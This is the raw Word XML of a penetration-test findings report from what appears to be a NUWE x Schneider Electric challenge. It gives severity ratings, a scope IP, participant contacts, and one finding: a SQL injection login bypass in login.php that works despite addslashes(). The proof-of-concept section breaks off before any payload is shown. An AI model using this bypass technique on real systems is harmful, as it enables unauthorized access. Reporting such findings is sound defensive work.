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left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4591050" cy="4591050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Imagen 2" descr="Nuwe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2" descr="Nuwe - YouTub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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="2124" w:firstLine="708"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Demo Company</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security Assessment Findings Report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lePageVersion"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Date: November 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 2022</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc119432373"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Contact Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1008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871"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1871" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208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</w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-793" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="58" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="58" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="2969"/>
        <w:gridCol w:w="4951"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true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7F7F7F" w:themeFill="text1" w:themeFillTint="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Name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7F7F7F" w:themeFill="text1" w:themeFillTint="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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7F7F7F" w:themeFill="text1" w:themeFillTint="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Contact Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100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cs="Times New Roman"/>
                <w:b/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">NUWE x Schneider Electric </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true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Text"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>daniello.alfonso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Text"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Participant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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Text"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Email: </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>daniello.alfonso@gmail.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Github: https://github.com/Virgo83</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true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Text"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:caps w:val="false"/>
                <w:smallCaps w:val="false"/>
                <w:color w:val="202124"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:caps w:val="false"/>
                <w:smallCaps w:val="false"/>
                <w:color w:val="202124"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0n3pr0t0n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Text"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Participant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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Text"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Email: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:caps w:val="false"/>
                <w:smallCaps w:val="false"/>
                <w:color w:val="202124"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0n3pr0t0n@proton.me</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Github: </w:t>
            </w:r>
            <w:hyperlink r:id="rId3" w:tgtFrame="_blank">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                </w:rPr>
                <w:t>https://github.com/DamBasement</w:t>
              </w:r>
            </w:hyperlink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>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc119432374"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Finding Severity Ratings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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following table defines levels of severity and corresponding CVSS score range that are used throughout the document to assess vulnerability and risk impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10074" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-7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883"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="6571"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:trHeight w:val="170" w:hRule="atLeast"/>
        </w:trPr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08080" w:themeFill="background1" w:themeFillShade="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Severity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08080" w:themeFill="background1" w:themeFillShade="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>CVSS V3 Score Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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08080" w:themeFill="background1" w:themeFillShade="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="709" w:hRule="atLeast"/>
        </w:trPr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0000" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Critical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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>9.0-10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and usually results in system-level compromise.  It is advised to form a plan of action and patch immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="699" w:hRule="atLeast"/>
        </w:trPr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0000" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>High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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>7.0-8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation is more difficult but could cause elevated privileges and potentially a loss of data or downtime.  It is advised to form a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="709" w:hRule="atLeast"/>
        </w:trPr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C000" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Moderate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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>4.0-6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilities exist but are not exploitable or require extra steps such as social engineering.  It is advised to form a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="548" w:hRule="atLeast"/>
        </w:trPr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BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Low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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>0.1-3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilities are non-exploitable but would reduce an organization’s attack surface.  It is advised to form a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="709" w:hRule="atLeast"/>
        </w:trPr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70C0" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Informational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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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TextSmall"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>No vulnerability exists.  Additional information is provided regarding items noticed during testing, strong controls, and additional documentation.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>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc119432375"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9569" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-538" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="58" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="58" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4028"/>
        <w:gridCol w:w="5540"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="406" w:hRule="atLeast"/>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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7F7F7F" w:themeFill="text1" w:themeFillTint="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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7F7F7F" w:themeFill="text1" w:themeFillTint="80" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeaderText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="744" w:hRule="atLeast"/>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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Security Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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18.130.53.47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>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc119432376"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Security Audit Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc119432377"/>
      <w:bookmarkStart w:id="5" w:name="_Toc9866482"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Vulnerability Name – Location (Severity)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-793" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="58" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="58" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1871"/>
        <w:gridCol w:w="8209"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Basic SQL Injection vulnerability available into the login.php file. It allows user to inject a malicious SQL query to bypass user validation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>http://internal.vese.com/login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="413" w:hRule="atLeast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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>https://www.inforge.net/forum/threads/bypassare-addslashes-usando-delle-format-string-e-ottenere-una-sql-injection.606602/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif" w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Despite the use of addslashes(), We are able to log in successfully without knowing a valid username or password. I can simply exploit the SQL injection vulnerability. Providing the following values as user and pass it will grant me the access:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif" w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
